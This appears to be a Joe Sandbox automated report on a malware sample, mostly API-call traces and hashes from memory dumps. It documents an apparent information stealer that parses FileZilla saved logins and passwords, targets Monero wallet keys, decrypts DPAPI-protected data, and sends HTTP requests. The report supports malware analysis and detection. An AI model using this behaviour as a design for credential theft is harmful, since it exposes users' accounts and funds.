                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,007BDDD0,00000000,?,008D0E10,00000000,?,00000000,00000000,?), ref: 008C7A7D
                                • wsprintfA.USER32 ref: 008C7AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: b369a71c609f777c3ec865312c570b7269f8c58e66ba1987d0c2ed19f72d3217
                                • Instruction ID: e2f033df22c1af7fedf1aff68cede45c3c5c15541b1bfbc6f08372f121ebed39
                                • Opcode Fuzzy Hash: b369a71c609f777c3ec865312c570b7269f8c58e66ba1987d0c2ed19f72d3217
                                • Instruction Fuzzy Hash: 58117CB1945228EBEB20DB94DC49FA9B778FB04761F10439AE91AD32C0D7745A40CF91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 1pon$:EQF$vH_?$|qo~
                                • API String ID: 0-364707436
                                • Opcode ID: 398f5174408c888431da34ae7b345716abff1f60dc936ed47b00e32525d9ae88
                                • Instruction ID: 529ce5d176ad8feb83790739d0d80a27c07edaa3e4439a87fd9c0693743e81c7
                                • Opcode Fuzzy Hash: 398f5174408c888431da34ae7b345716abff1f60dc936ed47b00e32525d9ae88
                                • Instruction Fuzzy Hash: 3F62D5F3A082009FD304AE2DDC8566AFBE9EF94760F1A493DEAC4C7744E63598458793
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: CQ`/$hg=W$hg=W
                                • API String ID: 0-3204022285
                                • Opcode ID: b219e3401bdb5852fb0df270c99267286ef52da938f1b958ca38d71668a64242
                                • Instruction ID: 1be05d1e96448b4a583315dc54c1d99ba183f018b0415f809abb586cbee538eb
                                • Opcode Fuzzy Hash: b219e3401bdb5852fb0df270c99267286ef52da938f1b958ca38d71668a64242
                                • Instruction Fuzzy Hash: 76B239F360C204AFE708AE2DEC8567AFBE9EF94320F1A453DE6C4C7744E93558058696
                                APIs
                                • CoCreateInstance.COMBASE(008CE118,00000000,00000001,008CE108,00000000), ref: 008C3758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 008C37B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: 256d538bf3d8b7cce6c5eddac8bd69acc75fc4dcec89357932fa7b99c9523aa8
                                • Instruction ID: 42c04cb4b172680e9fab2176aff3315d68bcc9f9efc519e2972fe9806feb7d96
                                • Opcode Fuzzy Hash: 256d538bf3d8b7cce6c5eddac8bd69acc75fc4dcec89357932fa7b99c9523aa8
                                • Instruction Fuzzy Hash: E341E970A40A189FDB24DB58CC95F9BB7B5FB48702F4081D8E618E7290E771AE86CF50
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008B9B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 008B9BA3
                                • LocalFree.KERNEL32(?), ref: 008B9BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: abf01ece3350aea0d53fe1af236473bc3634faed181ef5fbf95c5fcec2c7452c
                                • Instruction ID: 68cd6b33fb3bdd5f23f480be216053fb119b2edc1759cb8e36cd5e0617d8695a
                                • Opcode Fuzzy Hash: abf01ece3350aea0d53fe1af236473bc3634faed181ef5fbf95c5fcec2c7452c
                                • Instruction Fuzzy Hash: 7411A5B8A00209EFCB04DF94D985AAE77B9FB88300F104598E915AB350D770AE15CFA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: c$o|
                                • API String ID: 0-2353341362
                                • Opcode ID: 79872127eceff8cb87a2abec9f47afbcd5a739c88abf3c1804ce7a854c815ef0
                                • Instruction ID: 27ff0ae38348b13253545a6e111c13ccb0614e097191950c0b0a499bb1c44770
                                • Opcode Fuzzy Hash: 79872127eceff8cb87a2abec9f47afbcd5a739c88abf3c1804ce7a854c815ef0
                                • Instruction Fuzzy Hash: D6413DF39096049FE300BE3DEC946BABBE5EB94220F164A3DE9C0D3714E63558118B83
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ad14cae63bcbbbfab32913e9a7a49911aa84203af3cf541f4e5433fa64fc5335
                                • Instruction ID: 89d53fc7baf6552c4be212beb1451ee15a442914e4ddfff1d8b1ef8a1bfd4f67
                                • Opcode Fuzzy Hash: ad14cae63bcbbbfab32913e9a7a49911aa84203af3cf541f4e5433fa64fc5335
                                • Instruction Fuzzy Hash: 5E22C5B3A0C600AFE3056E29DC8677AFBE5EF94320F16492DE6C4C7744E63598418B97
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8612e959590d12dd1b1666ebce6094420bf935f2210c623b585a6dd07a04589a
                                • Instruction ID: dcc828d899ffcba401caea310b0310280a87f627dd444836ddeb304ae681709e
                                • Opcode Fuzzy Hash: 8612e959590d12dd1b1666ebce6094420bf935f2210c623b585a6dd07a04589a
                                • Instruction Fuzzy Hash: 0A6103F3A082005FF704AE2DEC8577AB7D5EB94710F0A863DEBC4C7784E93998148686
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7c9566f02f566781deb3a543cb5a405bb70df20ed8cd359794edf5f7cd0035e3
                                • Instruction ID: aa841582b9be0f37f851dc72fc367d38983a2f7275ac543937dfc318131a7651
                                • Opcode Fuzzy Hash: 7c9566f02f566781deb3a543cb5a405bb70df20ed8cd359794edf5f7cd0035e3
                                • Instruction Fuzzy Hash: 4B6114F390C2048FF308AE3DDCAA77ABAD5EB84310F1A453DDAC687784F93959058646
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 279788cfcf28a0f65aacb7877251e8f23bcc2a9ef0f8bac3e579fe4b91a284aa
                                • Instruction ID: bc1c619a9604ad12a6ba54f0f7aa1ddf34e3927b366219206fc997c04ea70ebb
                                • Opcode Fuzzy Hash: 279788cfcf28a0f65aacb7877251e8f23bcc2a9ef0f8bac3e579fe4b91a284aa
                                • Instruction Fuzzy Hash: B4415CF36497052BF300AD2EDC84B6AB7DAEBE8620F2E853DD7C4C3B45E83965068151
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 535645e9a0195915f9fd7dea9be3877d586f309021089d2fefaac47368b86827
                                • Instruction ID: 8894a0d123541f7c3c16d35d8ace99c19bb42fc2f7c946f043b8055d0b8aea2d
                                • Opcode Fuzzy Hash: 535645e9a0195915f9fd7dea9be3877d586f309021089d2fefaac47368b86827
                                • Instruction Fuzzy Hash: 2E4125B390C604DFC3146A28E945639F7E5AB84310F26892EE6DA93280F6718A40B667
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5eb956d8c760d05e3259eb11d275b7624343c3144a9e98b9f1bbffc72d9498ad
                                • Instruction ID: d46d66c897fb460109176e9db854bfc5a055ea917d19c7e6358b1430653ef509
                                • Opcode Fuzzy Hash: 5eb956d8c760d05e3259eb11d275b7624343c3144a9e98b9f1bbffc72d9498ad
                                • Instruction Fuzzy Hash: 8D41F6F3A086045FF304AE3DEC4537AB7DADBD4320F1A863DD584D3B88E53999458692
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dfa4fabc9e17db0b81ed7c23ee7266d1dd59b4f6e9282c67962cc6127c2b9431
                                • Instruction ID: 28776c07ba1df4a13f93a48befff637fc468987c7bb8be297a90f168f87bcba5
                                • Opcode Fuzzy Hash: dfa4fabc9e17db0b81ed7c23ee7266d1dd59b4f6e9282c67962cc6127c2b9431
                                • Instruction Fuzzy Hash: 9211ADF3F4521947F3545879DD4936AA6869794330F2F423A4F28A7BC1E87C9C0A0284
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008C8E0B
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008B99EC
                                  • Part of subcall function 008B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008B9A11
                                  • Part of subcall function 008B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008B9A31
                                  • Part of subcall function 008B99C0: ReadFile.KERNEL32(000000FF,?,00000000,008B148F,00000000), ref: 008B9A5A
                                  • Part of subcall function 008B99C0: LocalFree.KERNEL32(008B148F), ref: 008B9A90
                                  • Part of subcall function 008B99C0: CloseHandle.KERNEL32(000000FF), ref: 008B9A9A
                                  • Part of subcall function 008C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008C8E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,008D0DBA,008D0DB7,008D0DB6,008D0DB3), ref: 008C0362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C0369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 008C0385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C0393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 008C03CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C03DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 008C0419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C0427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 008C0463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C0475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C0502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C0532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 008C0562
                                • lstrcat.KERNEL32(?,profile: null), ref: 008C0571
                                • lstrcat.KERNEL32(?,url: ), ref: 008C0580
                                • lstrcat.KERNEL32(?,00000000), ref: 008C0593
                                • lstrcat.KERNEL32(?,008D1678), ref: 008C05A2
                                • lstrcat.KERNEL32(?,00000000), ref: 008C05B5
                                • lstrcat.KERNEL32(?,008D167C), ref: 008C05C4
                                • lstrcat.KERNEL32(?,login: ), ref: 008C05D3
                                • lstrcat.KERNEL32(?,00000000), ref: 008C05E6
                                • lstrcat.KERNEL32(?,008D1688), ref: 008C05F5
                                • lstrcat.KERNEL32(?,password: ), ref: 008C0604
                                • lstrcat.KERNEL32(?,00000000), ref: 008C0617
                                • lstrcat.KERNEL32(?,008D1698), ref: 008C0626
                                • lstrcat.KERNEL32(?,008D169C), ref: 008C0635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: cc0921171d3314d03ec7b98569176051634e1bc11a54a8703f40465c9a37d251
                                • Instruction ID: 3d2f68df69e2385a9d9cae8d3de605bb7a3b891b264f23b0e4d87754731dd803
                                • Opcode Fuzzy Hash: cc0921171d3314d03ec7b98569176051634e1bc11a54a8703f40465c9a37d251
                                • Instruction Fuzzy Hash: 80D11DB1900108ABCB08EBE8DD9AEEE7738FF24744F50451DF106E6191DE74EA06CB62
                                APIs
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008B4839
                                  • Part of subcall function 008B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008B4849
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008B59F8
                                • StrCmpCA.SHLWAPI(?,007BE270), ref: 008B5A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008B5B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,007BE310,00000000,?,007BCEF8,00000000,?,008D1A1C), ref: 008B5E71
                                • lstrlen.KERNEL32(00000000), ref: 008B5E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 008B5E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008B5E9A
                                • lstrlen.KERNEL32(00000000), ref: 008B5EAF
                                • lstrlen.KERNEL32(00000000), ref: 008B5ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008B5EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 008B5F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 008B5F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 008B5F4C
                                • InternetCloseHandle.WININET(00000000), ref: 008B5FB0
                                • InternetCloseHandle.WININET(00000000), ref: 008B5FBD
                                • HttpOpenRequestA.WININET(00000000,007BE2F0,?,007BD9C8,00000000,00000000,00400100,00000000), ref: 008B5BF8
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • InternetCloseHandle.WININET(00000000), ref: 008B5FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------$p{
                                • API String ID: 874700897-2654658531
                                • Opcode ID: 2b7d4d3b71c69c86083b2b281ba1d0ec90eae3a954b7c1ba7b4a2eb68b523b33
                                • Instruction ID: d7736f44e381c9d585a6a507d3344f6b7e0e246523af1fe61e2bdbdae62fd9af
                                • Opcode Fuzzy Hash: 2b7d4d3b71c69c86083b2b281ba1d0ec90eae3a954b7c1ba7b4a2eb68b523b33
                                • Instruction Fuzzy Hash: 7A12CB7182011CABDB19EBA4DC96FEEB378FF14704F50416DB10AA2191DF706A4ACB66
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
